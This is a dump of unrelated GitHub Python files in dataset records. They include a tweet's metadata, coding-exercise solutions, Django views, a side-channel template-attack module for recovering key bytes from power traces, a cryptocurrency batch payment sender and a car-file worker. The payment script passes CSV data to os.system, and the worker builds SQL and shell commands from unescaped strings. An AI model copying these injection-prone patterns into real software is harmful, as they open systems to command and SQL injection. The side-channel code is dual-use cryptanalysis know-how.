\"http:\\/\\/pbs.twimg.com\\/profile_background_images\\/444119123593670656\\/5UcT95_v.jpeg\",\n \"profile_background_image_url_https\": \"https:\\/\\/pbs.twimg.com\\/profile_background_images\\/444119123593670656\\/5UcT95_v.jpeg\",\n \"profile_background_tile\": true, \"profile_link_color\": \"0084B4\",\n \"profile_sidebar_border_color\": \"FFFFFF\", \"profile_sidebar_fill_color\": \"DDEEF6\",\n \"profile_text_color\": \"333333\", \"profile_use_background_image\": true,\n \"profile_image_url\": \"http:\\/\\/pbs.twimg.com\\/profile_images\\/854332509823406081\\/cCclbnUP_normal.jpg\",\n \"profile_image_url_https\": \"https:\\/\\/pbs.twimg.com\\/profile_images\\/854332509823406081\\/cCclbnUP_normal.jpg\",\n \"profile_banner_url\": \"https:\\/\\/pbs.twimg.com\\/profile_banners\\/2360637557\\/1491606706\",\n \"default_profile\": false, \"default_profile_image\": false, \"following\": null,\n \"follow_request_sent\": null, \"notifications\": null}, \"geo\": null, \"coordinates\": null,\n \"place\": {\"id\": \"0b5219d6ce6a63ee\",\n \"url\": \"https:\\/\\/api.twitter.com\\/1.1\\/geo\\/id\\/0b5219d6ce6a63ee.json\", \"place_type\": \"admin\",\n \"name\": \"Adapazar\\u0131\", \"full_name\": \"Adapazar\\u0131, Sakarya\", \"country_code\": \"TR\",\n \"country\": \"T\\u00fcrkiye\", \"bounding_box\": {\"type\": \"Polygon\", \"coordinates\": [\n [[30.228445, 40.734714], [30.228445, 40.963103], [30.594337, 40.963103], [30.594337, 40.734714]]]},\n \"attributes\": {}}, \"contributors\": null, \"is_quote_status\": false, \"retweet_count\": 0,\n \"favorite_count\": 0, \"entities\": {\"hashtags\": [], \"urls\": [], \"user_mentions\": [], \"symbols\": [],\n \"media\": [{\"id\": 855144330088124417, \"id_str\": \"855144330088124417\",\n \"indices\": [2, 25],\n \"media_url\": \"http:\\/\\/pbs.twimg.com\\/media\\/C94VPMqXkAEB774.jpg\",\n \"media_url_https\": \"https:\\/\\/pbs.twimg.com\\/media\\/C94VPMqXkAEB774.jpg\",\n \"url\": \"https:\\/\\/t.co\\/rIuwfNs4IY\",\n \"display_url\": \"pic.twitter.com\\/rIuwfNs4IY\",\n \"expanded_url\": \"https:\\/\\/twitter.com\\/maykiiix\\/status\\/855144341534371841\\/photo\\/1\",\n \"type\": \"photo\",\n \"sizes\": {\"medium\": {\"w\": 480, \"h\": 797, \"resize\": \"fit\"},\n \"large\": {\"w\": 480, \"h\": 797, \"resize\": \"fit\"},\n \"thumb\": {\"w\": 150, \"h\": 150, \"resize\": \"crop\"},\n \"small\": {\"w\": 410, \"h\": 680, \"resize\": \"fit\"}}}]},\n \"extended_entities\": {\"media\": [\n {\"id\": 855144330088124417, \"id_str\": \"855144330088124417\", \"indices\": [2, 25],\n \"media_url\": \"http:\\/\\/pbs.twimg.com\\/media\\/C94VPMqXkAEB774.jpg\",\n \"media_url_https\": \"https:\\/\\/pbs.twimg.com\\/media\\/C94VPMqXkAEB774.jpg\",\n \"url\": \"https:\\/\\/t.co\\/rIuwfNs4IY\", \"display_url\": \"pic.twitter.com\\/rIuwfNs4IY\",\n \"expanded_url\": \"https:\\/\\/twitter.com\\/maykiiix\\/status\\/855144341534371841\\/photo\\/1\",\n \"type\": \"photo\", \"sizes\": {\"medium\": {\"w\": 480, \"h\": 797, \"resize\": \"fit\"},\n \"thumb\": {\"w\": 150, \"h\": 150, \"resize\": \"crop\"},\n \"small\": {\"w\": 410, \"h\": 680, \"resize\": \"fit\"}}}]}, \"favorited\": false,\n \"retweeted\": false, \"possibly_sensitive\": false, \"filter_level\": \"low\", \"lang\": \"und\",\n \"timestamp_ms\": \"1492717273492\"}","repo_name":"zijiezhu/TwitterTrend","sub_path":"TwitterTrend/Backend/tweetListener.py","file_name":"tweetListener.py","file_ext":"py","file_size_in_byte":7639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1387659114","text":"import sys\nMAX = 100000\ninput = sys.stdin.readline\n\nfor tb in range(int(input())):\n n = int(input())\n candidates = []\n\n for i in range(n):\n [a, b] = map(int, input().split())\n candidates.append((a, b))\n\n candidates.sort()\n\n paper_min = candidates[0][0]\n interview_min = candidates[0][1]\n count = 1\n\n for paper, interview in candidates[1:]:\n if interview > interview_min:\n continue\n else:\n interview_min = min(interview, interview_min)\n count += 1\n\n print(count)\n","repo_name":"Dltmd202/BOJ-ProblemSlove","sub_path":"python/1946/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3303555193","text":"import random\n\n# https://leetcode.com/problems/insert-delete-getrandom-o1/\n\nclass RandomizedSet:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.store = set()\n self.all_store = []\n def insert(self, val: int) -> bool:\n \"\"\"\n Inserts a value to the set. Returns true if the set did not already contain the specified element.\n \"\"\"\n if val not in self.store:\n self.store.add(val)\n self.all_store.append(val)\n return True\n return False\n\n def remove(self, val: int) -> bool:\n \"\"\"\n Removes a value from the set. Returns true if the set contained the specified element.\n \"\"\"\n if val in self.store:\n self.store.remove(val)\n return True\n return False\n\n def getRandom(self) -> int:\n \"\"\"\n Get a random element from the set.\n \"\"\"\n while True:\n if len(self.all_store) == 1:\n chosen = 0\n else:\n chosen = random.randint(0, len(self.all_store) - 1)\n if self.all_store[chosen] in self.store:\n return self.all_store[chosen]\n self.all_store.pop(chosen)\n \n\n\n# Your RandomizedSet object will be instantiated and called as such:\n# obj = RandomizedSet()\n# param_1 = obj.insert(val)\n# param_2 = obj.remove(val)\n# param_3 = obj.getRandom()\n","repo_name":"Infinidrix/competitive-programming","sub_path":"Day 24/RandomizedSet.py","file_name":"RandomizedSet.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40342404685","text":"from django.views import View\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import render\nfrom collections import deque\n\nline_of_cars = {'change_oil': deque(),\n 'inflate_tires': deque(),\n 'diagnostic': deque()}\n\nid_ticket = 0\nnumber_of_ticket = None\n\n\nclass WelcomeView(View):\n def get(self):\n return HttpResponse('

Welcome to the Hypercar Service!

')\n\n\nclass MenuView(View):\n menu = {'change_oil': 'Change oil',\n 'inflate_tires': 'Inflate tires',\n 'diagnostic': 'Get diagnostic test'}\n template_name = 'tickets/menu.html'\n\n def get(self, request):\n return render(request, self.template_name, context={'menu': self.menu})\n\n\nclass GetTicket(View):\n template_name = 'tickets/get_ticket.html'\n ticket_type = None\n\n def get(self, request, ticket_type):\n self.ticket_type = ticket_type\n context = self.getting_number()\n return render(request, self.template_name, context=context)\n\n def getting_number(self):\n global id_ticket\n if self.ticket_type in line_of_cars.keys():\n minutes = self.count_waiting_time()\n id_ticket += 1\n line_of_cars[self.ticket_type].append(id_ticket)\n return {'id_ticket': str(id_ticket),\n 'minutes': str(minutes)}\n\n def count_waiting_time(self):\n change_oil = len(line_of_cars['change_oil']) * 2\n inflate_tires = change_oil + len(line_of_cars['inflate_tires']) * 5\n diagnostic = inflate_tires + len(line_of_cars['diagnostic']) * 30\n if self.ticket_type == 'change_oil':\n return change_oil\n if self.ticket_type == 'inflate_tires':\n return inflate_tires\n if self.ticket_type == 'diagnostic':\n return diagnostic\n\n\nclass Processing(View):\n template_name = 'tickets/processing.html'\n\n def get(self, request):\n context = {'change_oil': len(line_of_cars['change_oil']),\n 'inflate_tires': len(line_of_cars['inflate_tires']),\n 'diagnostic': len(line_of_cars['diagnostic'])}\n return render(request, self.template_name, context=context)\n\n def post(self, request):\n next_ticket = None\n global number_of_ticket\n if len(line_of_cars['change_oil']) > 0:\n next_ticket = 'change_oil'\n elif len(line_of_cars['inflate_tires']) > 0:\n next_ticket = 'inflate_tires'\n elif len(line_of_cars['diagnostic']) > 0:\n next_ticket = 'diagnostic'\n if next_ticket is not None:\n number_of_ticket = line_of_cars[next_ticket].popleft()\n else:\n number_of_ticket = None\n return self.get(request)\n\n\nclass Next(View):\n template_name = 'tickets/next.html'\n\n def get(self, request):\n context = {'number_of_ticket': number_of_ticket}\n return render(request, self.template_name, context=context)\n","repo_name":"skripnn/Hypercar_Service_Center","sub_path":"tickets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71748629587","text":"import random\nfrom matplotlib import pyplot\nimport numpy as np\n\n\ndef recursive_probably(p_matrix, previous_probably, count_t):\n if count_t == 0:\n return previous_probably\n current_probably = recursive_probably(p_matrix, previous_probably, count_t - 1).dot(p_matrix)\n return current_probably\n\n\ndef get_p_t_recursive(p_matrix, start_state, count_t):\n result = np.zeros(count_t)\n states = np.zeros(2)\n states[start_state] = 1\n for i in range(count_t):\n result[i] = recursive_probably(p_matrix, states, i)[start_state]\n return result\n\n\ndef get_p_t_th(p_matrix, start_state, count_t):\n result = np.zeros(count_t)\n states = np.zeros(2)\n states[start_state] = 1\n for i in range(count_t):\n pow_matrix = np.linalg.matrix_power(p_matrix, i)\n result[i] = states.dot(pow_matrix[start_state])\n return result\n\n\ndef get_p_t(p_matrix, start_state, count_n, count_t):\n result = np.zeros(count_t)\n for n in range(count_n):\n state = start_state\n for i in range(count_t):\n if state == start_state:\n result[i] += 1\n next_state_prob = random.random()\n if next_state_prob < p_matrix[state][start_state]:\n state = start_state\n else:\n state = (start_state + 1) % 2\n for i in range(T):\n result[i] /= N\n return result\n\n\nif __name__ == '__main__':\n P = np.array([[0.8, 0.2],\n [0.6, 0.4]])\n my_start_state = 1\n N = 100000\n T = 20\n\n p_t = get_p_t(P, my_start_state, N, T)\n p_t_th = get_p_t_th(P, my_start_state, T)\n p_t_rec = get_p_t_recursive(P, my_start_state, T)\n\n pyplot.plot(range(T), p_t)\n pyplot.plot(range(T), p_t_th)\n pyplot.savefig(\"result.png\")\n\n pyplot.clf()\n\n pyplot.plot(range(T), p_t)\n pyplot.plot(range(T), p_t_rec, \"r\")\n pyplot.savefig(\"result_rec.png\")\n","repo_name":"avdvnk/dopuski","sub_path":"task1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42161966412","text":"import numpy as np\nfrom sutils import trange\nfrom sfileengine import FileEngine\nfrom processors import ID_wise_mean\nfrom processors import ID_wise_mean_balanced\n# ======================================================================================\n#\n# ======================================================================================\ndef covariance_templates(clustered_traces:np.ndarray, n_classes:int, projection:np.ndarray):\n\t\"\"\"Build the mean and variance templates based on reduce train samples\n\n\t:param train_data: Sorted grouped array of traces, it normally comes from the output of a \n\t\tsorting functions which sorts and groups the traces by an specific criterion e.g. label\n\t\tor Sbox output value.\n\t:type train_data: np.ndarray\n\n\t:param n_classes:\n\t:type n_classes: int\n\n\t:param projection:\n\t:type projection:\n\t\"\"\"\n\t__mean = np.empty(0)\n\t__smat = np.empty(0)\n\t__n_poi = projection.shape(1)\n\tfor i in trange(n_classes, desc='[INFO *CovarianceTemplates*]: Computing covariance and mean matrixes'):\n\t\t__full_projected_train = np.empty(0)\n\n\t\t# It uses the feature space (projection) and projects to it each of the grouped traces.\n\t\t# i.e. projected_train is the projected traces of the i-th class\n\t\t# By doing this projection, the point of interest are gathered or re-arranged somehow\n\t\t# that might help the algorithm in choosing them smartly; from the projection\n\t\t# a n_poi of points is selected to build a mean matrix out of them.\n\t\t__projected_train = np.dot(clustered_traces[i], projection)\n\t\t__full_projected_train = np.append(__full_projected_train, __projected_train)\n\t\t__full_projected_train = np.reshape(__full_projected_train, (clustered_traces[i].shape[0], __n_poi))\n\t\t\n\t\t# Appends the mean of the projected train of the specific trace group\n\t\t# Here, the mean matrix is created, notice that this is the mean matrix\n\t\t# at each point of interest\n\t\t__mean = np.append(__mean, np.mean(__full_projected_train, axis=0))\n\t\t\n\t\t# After creating the mean matrix, we proceed to create the covariance matrix.\n\t\t# Similarly, to the mean matrix of each PoI, the covariance matrix is a matrix\n\t\t# formed as M_(n_poixn_poi)\n\t\t__smat = np.append(__smat, np.cov(np.transpose(__full_projected_train)))\n\t\n\t__cov_matrix = np.reshape(__smat, (n_classes, __n_poi, __n_poi))\n\t__mean_matrix = np.reshape(__mean, (n_classes, __n_poi))\n\n\treturn __mean_matrix, __cov_matrix\n# ======================================================================================\n#\n# ======================================================================================\ndef cov_mean_matrix(fileEngine:FileEngine, n_classes:int=256):\n\t\"\"\"Build the mean and variance templates based on reduce train samples\n\n\t:param train_data: Sorted grouped array of traces, it normally comes from the output of a \n\t\tsorting functions which sorts and groups the traces by an specific criterion e.g. label\n\t\tor Sbox output value.\n\t:type train_data: `np.ndarray`\n\n\t:param n_classes:\n\t:type n_classes: int\n\t\"\"\"\n\t__mean = np.empty((256, fileEngine.TotalSamples))\n\t__cov_matrix = np.empty((256, fileEngine.TotalSamples, fileEngine.TotalSamples))\n\t\n\t_, op_mean, _, clustered_traces = ID_wise_mean(fileEngine, clustered_traces=True)\n\t__mean[:] = op_mean[:]\n\tfor i_class in trange(n_classes, desc='[INFO *CovarianceTemplates*]: Computing covariance and mean matrices', position=0):\n\t\tfor i in trange(fileEngine.TotalSamples, desc='Row of {}'.format(i_class), position=1, leave=False):\n\t\t\tfor j in trange(fileEngine.TotalSamples, desc='col of {} and {}'.format(i_class, i), position=2, leave=False):\n\t\t\t\t# Set the next trace\n\t\t\t\ttrace_meta = np.array(fileEngine[clustered_traces[i_class]], dtype=np.ndarray)\n\t\t\t\t# Get the trace from the smaller file engine\n\t\t\t\ttraces = np.vstack(trace_meta[:,0])\n\t\t\t\tx = traces[:, i]\n\t\t\t\ty = traces[:, j]\n\t\t\t\t__cov_matrix[i_class, i, j] = np.cov(x, y)[0][1]\n\t\n\treturn __mean, __cov_matrix\n# ======================================================================================\n#\n# ======================================================================================\ndef _compute_covmean_matrix(n_classes, function_callback, **kwargs):\n\tfileEngine = kwargs['dataset']\n\n\t__mean = np.empty((256, fileEngine.TotalSamples))\n\tsmat = np.empty(0)\n\n\t_, op_mean, _, clustered_traces = function_callback(**kwargs)\n\n\t__mean[:] = op_mean[:]\n\t\n\tfor i_class in trange(n_classes, desc='[INFO *CovMeanTemplates*]: Computing covariance and mean matrices', position=0):\n\t\t# Set the next trace\n\t\ttrace_meta = np.array(fileEngine[clustered_traces[i_class]], dtype=np.ndarray)\n\t\t# Get the trace from the smaller file engine\n\t\ttraces = np.vstack(trace_meta[:,0])\n\t\tsmat = np.append(smat, np.cov(np.transpose(traces)))\n\n\t__cov_matrix = np.reshape(smat, (n_classes, fileEngine.TotalSamples, fileEngine.TotalSamples))\n\t\n\treturn __mean, __cov_matrix\n# ======================================================================================\n#\n# ======================================================================================\ndef covmean_matrix(\n\t\tfileEngine:FileEngine, n_classes:int=256, n_traces:int=None, \n\t\tplaintext_pos:int=None, key_pos:int=None, by_label:bool=True):\n\t\"\"\"Build the mean and variance templates based a TraceSet. The model is based on ID leakage model.\n\n\t:param fileEngine: A fileEngine that maps the TraceSet, normally, it represents the train set in a template attack\n\t:type fileEngine: :class:`FileEngine`\n\n\t:param n_classes:\n\t:type n_classes: int\n\t\"\"\"\n\t\n\tm_kwargs = {'dataset':fileEngine, \n\t\t'plaintext_pos':plaintext_pos, \n\t\t'key_pos':key_pos, \n\t\t'n_traces':n_traces, \n\t\t'by_label':by_label, \n\t\t'clustered_traces':True}\n\n\treturn _compute_covmean_matrix(n_classes, ID_wise_mean, **m_kwargs)\n\n# ======================================================================================\n#\n# ======================================================================================\ndef covmean_matrix_balanced(\n\t\tfileEngine:FileEngine, n_classes:int=256, n_indexes:int=None, \n\t\tbalancer_file=None, plaintext_pos:int=None, key_pos:int=None, \n\t\tby_label:bool=True):\n\t\"\"\"Build the mean and variance templates based a TraceSet. The model is based on ID leakage model.\n\n\t:param fileEngine: A fileEngine that maps the TraceSet, normally, it represents the train set in a template attack\n\t:type fileEngine: :class:`FileEngine`\n\n\t:param n_classes:\n\t:type n_classes: int\n\t\"\"\"\n\tm_kwargs = {'dataset':fileEngine,\n\t\t'balancer_file':balancer_file, \n\t\t'n_indexes':n_indexes,\n\t\t'plaintext_pos':plaintext_pos, \n\t\t'key_pos':key_pos, \n\t\t'n_indexes':n_indexes, \n\t\t'by_label':by_label, \n\t\t'clustered_traces':True}\n\t\t\t\t\n\treturn _compute_covmean_matrix(n_classes, ID_wise_mean_balanced, **m_kwargs)\n# ======================================================================================\n#\n# ======================================================================================\ndef template_predict(\n\t\ttest_fileengine:FileEngine, mean_matrix:np.ndarray, \n\t\tcov_matrix:np.ndarray, n_classes:int=256):\n\t\"\"\"\n\t:param test_fileengine:\n\t:type test_fileengine: :class:`FileEngine`\n\n\t:param mean_matrix:\n\t:type mean_matrix: `np.ndarray`\n\n\t:param cov_matrix:\n\t:type cov_matrix: `np.ndarray`\n\t\n\t:param n_classes:\n\t:type n_classes: `int`\n\t\"\"\"\n\tsmat_pool = np.sum(cov_matrix, axis=0)/n_classes\n\tinv_smat_pool = np.linalg.inv(smat_pool)\n\n\tres = np.zeros(shape=(test_fileengine.shape[0], n_classes))\n\tfor i in trange(test_fileengine.shape[0], desc='[INFO]: Computing template predictions', position=0):\n\t\tfor k in range(n_classes):\n\t\t\tT_k = np.array(test_fileengine[i][0], dtype=float) - mean_matrix[k]\n\t\t\tres[i,k] = -0.5* (np.dot(np.dot(T_k , inv_smat_pool), np.transpose(T_k)))\n\t\n\tres = np.reshape(res,(test_fileengine.shape[0], n_classes))\n\tpredict = np.empty((test_fileengine.shape[0], n_classes))\n\tprint (res)\n\tfor k in range(test_fileengine.shape[0]):\n\t\tpredict[k] = np.flip(np.argsort(res[k]))\n\treturn predict\n# ======================================================================================\n#\n# ======================================================================================\nclass CovMeanMatrix:\n\t@staticmethod\n\tdef from_fileengine():\n\t\tpass","repo_name":"chaserfw/chaserfw_packages","sub_path":"math/templates/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":8123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28602644810","text":"import time\n\n\"\"\"\nCall send_nogui.py (edit not to require manual confirmation)\nfor each address to pay.\n\nrewards.csv is to be in the same dir.\nformat is one payout per line, comma separated, address,amount,extra\n\n```25125e9bb305fafd51ceb2858d355f77da99550b933ec0923cd156ff,1310.4750655411829,5111\n8f2d03c817c3d36a864c99a27f6b6179eb1898a631bc007a7e0ffa39,603.0595488461871,2352\n0fc9b60126b8b5be3ab990eea6f184b02c1c0c5352709d023256ca58,459.7303448474547,1793```\n\nAmount really sent will be reduced by the tx fee, 0.01\n\nNO SAFETY there, be sure what you do.\n\nThe node has to be running with mempool on disk, not on ram or send_nogui does not work!!!\n\"\"\"\n\n\n\nimport argparse\nimport os\n\n__version__ = \"0.0.1\"\n\n\nSEND_PATH = \"send_nogui_noconf.py\" # path to modified send_no_gui.py in the Bismuth Dir.\n# That node has to be running with mempool on disk, not on ram!!!\n\nPYTHON_EXECUTABLE = \"python3\"\n\nparser = argparse.ArgumentParser(description='Bismuth Batch reward sender')\n# parser.add_argument(\"-v\", \"--verbose\", action=\"count\", default=False, help='Be verbose.')\nparser.add_argument(\"-y\", \"--yes\", action=\"count\", default=False, help='Do send')\nargs = parser.parse_args()\n\ntotal = 0\nnb = 0\nfor line in open('rewards.csv' , 'r'):\n data = line.strip().split(',')\n print (data)\n if len(data) > 1:\n try:\n total += float(data[1])\n data[1] = float(data[1]) - 0.01\n command = \"{} {} {} {} tx \".format(PYTHON_EXECUTABLE, SEND_PATH, data[1], data[0])\n if args.yes:\n print(\"Running: {}\".format(command))\n os.system(command)\n else:\n print(\"Check: {}, didn't you forget the magic word?\".format(command))\n nb += 1\n time.sleep(1)\n except Exception as e:\n print (e)\n\nprint(\"{} Transactions, {} $BIS total.\".format(nb, total))\n","repo_name":"hclivess/Bismuth","sub_path":"send_csv.py","file_name":"send_csv.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":187,"dataset":"github-code","pt":"48"} +{"seq_id":"11591660397","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 18 09:59:34 2023\n\n@author: wfschrec\n\"\"\"\n\nimport fastapi\nimport logging\nimport requests\nimport time\nimport configparser\nimport dbmanager\nimport os\nimport shutil\nimport subprocess\nimport re\nfrom fastapi import FastAPI, BackgroundTasks\nimport psycopg2\nfrom concurrent.futures.thread import ThreadPoolExecutor\n\napp = FastAPI()\napp = fastapi.FastAPI()\n\nconfig = configparser.ConfigParser()\nconfig.read('worker.ini')\n\nconnected = False\n\n\ndef db_register():\n\n logging.debug(\"Registering worker in database.\")\n dbmgr = dbmanager.DbManager()\n\n try:\n workip = config.get('worker', 'ip_addr')\n workport = config.get('worker', 'port')\n\n create_command = \"\"\"\n CREATE TABLE IF NOT EXISTS ptolemy_workers (ip_addr TEXT PRIMARY KEY, port TEXT, active BOOLEAN);\n \"\"\"\n dbmgr.execute_command(create_command)\n dbmgr.db_bulk_commit()\n\n check_command = \"\"\"\n SELECT COUNT(1) FROM ptolemy_workers WHERE ip_addr = '%s' AND port = '%s';\n \"\"\"\n result = dbmgr.exe_fetch_one(\n check_command % (workip, workport))\n\n if(result[0] > 0):\n activate_command = \"\"\"\n UPDATE ptolemy_workers SET active = 't' WHERE ip_addr = '%s' AND port = '%s';\n \"\"\"\n dbmgr.execute_command(activate_command %\n (workip, workport))\n dbmgr.db_bulk_commit()\n dbmgr.close_db_conn()\n else:\n add_command = \"\"\"\n INSERT INTO ptolemy_workers (ip_addr, port, active) VALUES (\\'%s\\', \\'%s\\', 't');\n \"\"\"\n dbmgr.execute_command(add_command % (workip, workport))\n dbmgr.db_bulk_commit()\n\n dbmgr.close_db_conn()\n\n except(Exception) as error:\n dbmgr.close_db_conn()\n raise HTTPException(status_code=500, detail=str(error))\n\n\n# Run the application\nif __name__ == '__main__':\n db_register()\n import uvicorn\n uvicorn.run(\"worker:app\", host=config.get('worker', 'ip_addr'), port=int(config.get(\n 'worker', 'port')), workers=int(config.get('worker', 'threads')), log_level=\"warning\")\n\n#\n# Basic reply to heartbeat request from orchestrator to ensure our endpoint\n# is still functional.\n#\n\n\n@app.get(\"/v0/heartbeat/\")\ndef return_heartbeat():\n workip = config.get('worker', 'ip_addr')\n workport = config.get('worker', 'port')\n logging.debug(\"Worker %s with port %s is alive and well.\" %\n (workip, workport))\n\n#\n# Function used to split a file into sized chunks\n#\n\n\ndef split_file(file_id, piece_size, staging_dir):\n\n with open(file_id, 'rb') as infile:\n index = 0\n while True:\n chunk = infile.read(piece_size)\n if not chunk:\n break\n chunk_path = file_id + \".ptolemy\" + str(index)\n target = os.path.join(staging_dir, chunk_path[1:])\n temp_stor = os.path.split(target)\n logging.debug(\"Making directory: %s\" % temp_stor[0])\n os.makedirs(temp_stor[0], exist_ok=True)\n with open(target, 'wb') as outfile:\n outfile.write(chunk)\n outfile.close()\n index += 1\n infile.close()\n\n#\n#\n#\n\n\ndef process_car(cariter, project):\n\n # Command to get the list of car files we are building\n list_command = \"\"\"\n SELECT file_id, size FROM %s WHERE carfile = \\'%s\\' ;\n \"\"\"\n project_command = \"\"\"\n SELECT staging_dir, shard_size FROM ptolemy_projects WHERE project = \\'%s\\';\n \"\"\"\n\n global config\n car_util = config.get('worker', 'car_gen')\n stream_util = config.get('worker', 'commp')\n\n dbconf = configparser.ConfigParser()\n dbconf.read('database.ini')\n host = dbconf.get('database', 'host')\n dbname = dbconf.get('database', 'db_name')\n user = dbconf.get('database', 'db_user')\n passwd = dbconf.get('database', 'pass')\n\n conn = psycopg2.connect(host=host, database=dbname,\n user=user, password=passwd)\n cursor = conn.cursor()\n\n cursor.execute(project_command % project)\n project_meta = cursor.fetchone()\n\n cursor.execute(list_command % (project, cariter))\n file_list = cursor.fetchall()\n\n os.makedirs(os.path.join(project_meta[0], cariter), exist_ok=True)\n logging.info(\"Running car build for artifact: %s\" % cariter)\n\n piece_size = 1024 * 1024 * 1024 * project_meta[1]\n\n # Iterate through each file and place it in the car staging area,\n # if a file shard is requested we must split the file as well.\n for file_iter in file_list:\n try:\n if('.ptolemy' in file_iter[0]):\n # We check to see if the shard exists in staging then move it, otherwise\n # we shard the main file and then move the shard we are targeting.\n temp = os.path.join(project_meta[0], file_iter[0][1:])\n if(os.path.isfile(temp)):\n logging.debug(\n \"Found shard %s and placing in car directory.\" % file_iter[0])\n root = os.path.split(file_iter[0])\n car_stage = os.path.join(project_meta[0], cariter)\n landing_spot = os.path.join(car_stage, root[0][1:])\n os.makedirs(landing_spot, exist_ok=True)\n shutil.move(temp, landing_spot)\n logging.debug(\"Placed file %s in car staging area %s.\" % (\n file_iter[0], landing_spot))\n else:\n pathing = file_iter[0].split('.ptolemy')\n split_file(pathing[0], piece_size, project_meta[0])\n root = os.path.split(file_iter[0])\n car_stage = os.path.join(project_meta[0], cariter)\n landing_spot = os.path.join(car_stage, root[0][1:])\n os.makedirs(landing_spot, exist_ok=True)\n shutil.move(temp, landing_spot)\n logging.debug(\"Placed file %s in car staging area %s.\" % (\n file_iter[0], landing_spot))\n else:\n root = os.path.split(file_iter[0])\n car_stage = os.path.join(project_meta[0], cariter)\n landing_spot = os.path.join(car_stage, root[0][1:])\n os.makedirs(landing_spot, exist_ok=True)\n shutil.copy(file_iter[0], landing_spot)\n logging.debug(\"Placed file %s in car staging area %s.\" %\n (file_iter[0], landing_spot))\n except(Exception) as error:\n logging.error(error)\n\n logging.info(\n \"Finished building car container %s and placing it in our staging area.\" % cariter)\n\n try:\n\n car_path = os.path.join(project_meta[0], cariter)\n\n command = car_util + \" c --version 1 -f %s.car %s\"\n logging.info(\"Executing command go-car for dir %s\" % cariter)\n result = subprocess.run(command % (\n car_path, car_path), capture_output=True, shell=True)\n\n stream_cmd = \"cat %s | \" + stream_util\n root_cmd = car_util + \" root %s\"\n logging.info(\"Calculating root CID and commp for %s\" % cariter)\n target_car = os.path.join(project_meta[0], cariter + \".car\")\n root_result = subprocess.run(\n (root_cmd % target_car), capture_output=True, shell=True, text=True)\n commp_result = subprocess.run(\n (stream_cmd % target_car), capture_output=True, check=True, text=True, shell=True)\n out = commp_result.stderr.strip()\n\n commp_re = re.compile('CommPCid: (b[A-Za-z2-7]{58,})')\n corrupt_re = re.compile('\\*CORRUPTED\\*')\n padded_piece_re = re.compile('Padded piece:\\s+(\\d+)\\sbytes')\n payload_re = re.compile('Payload:\\s+(\\d+)\\sbytes')\n\n commp_m = commp_re.findall(out)\n corrupt = corrupt_re.match(out)\n padded_piece_m = padded_piece_re.findall(out)\n payload_m = payload_re.findall(out)\n\n sql_command = \"UPDATE ptolemy_cars SET cid=\\'%s\\', commp=\\'%s\\', size=%i, padded_size=%i, processed='t' WHERE car_id=\\'%s\\';\"\n cursor.execute(sql_command % (root_result.stdout.strip(), commp_m[0], int(\n payload_m[0]), int(padded_piece_m[0]), cariter))\n conn.commit()\n new_car_name = os.path.join(project_meta[0], commp_m[0] + \".car\")\n shutil.move(target_car, new_car_name)\n\n conn.close()\n\n # clean up the staging directory\n shutil.rmtree(car_path)\n\n except(Exception) as error:\n logging.error(error)\n conn.rollback()\n conn.close()\n\n#\n#\n#\n\n\n@app.post(\"/v0/blitz/{project}\")\ndef blitz_build(project: str, background_tasks: BackgroundTasks):\n background_tasks.add_task(blitz, project)\n return {\"Message\": \"Worker performing blitz build in background.\"}\n\n#\n# Run the blitz\n#\n\n\ndef blitz(project: str):\n\n executor = ThreadPoolExecutor(int(config.get('worker', 'threads')))\n futures = []\n\n dbmgr = dbmanager.DbManager()\n car_command = \"SELECT car_id FROM ptolemy_cars WHERE worker_ip = '%s' AND project = '%s';\"\n car_files = dbmgr.exe_fetch_all(car_command % (\n config.get('worker', 'ip_addr'), project))\n\n logging.info(\"Identified %i car files for %s worker to build.\" %\n (len(car_files), config.get('worker', 'ip_addr')))\n\n for iter in car_files:\n logging.info(\"Allocating a thread to build container: %s\" % iter[0])\n futures.append(executor.submit(process_car, iter[0], project))\n\n logging.info(\"Size of futures is: %i\" % len(futures))\n\n for future in futures:\n future.result()\n\n return {\"message\": \"Cars have been added to worker, starting processing job.\"}\n","repo_name":"schreck23/ptolemy","sub_path":"worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":9773,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6958810583","text":"def main():\n\n # one method of splitting string\n my_string = 'hello'\n my_list = []\n for letter in my_string:\n my_list.append(letter)\n print(my_list)\n\n # same thing, one line\n my_list = [letter for letter in my_string]\n print(my_list)\n\n new_list = [num for num in range(0,11)]\n print(new_list)\n new_list = [num**2 for num in range(0,11)]\n print(new_list)\n\n # can have conditionals inside\n new_list = [num for num in range(0,11) if num%2==0]\n print(new_list)\n\n # can perform calculations inside\n degrees_C = [0,10,20,100]\n degrees_F = [((9/5)*temp+32) for temp in degrees_C]\n print(degrees_C)\n print(degrees_F)\n\n # get first letter of each work using list comprehension\n my_string = 'this is my string'\n my_list = [word[0] for word in my_string.split()]\n print(my_list)\n\n\n pass\nmain()\n","repo_name":"akirtley/python_review_course","sub_path":"section_2_python_statements/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4998809414","text":"#!/usr/bin/env python 3\n\n############################################################################################\n# #\n# Program purpose: Creates multiple lists. #\n# Program Author : Happi 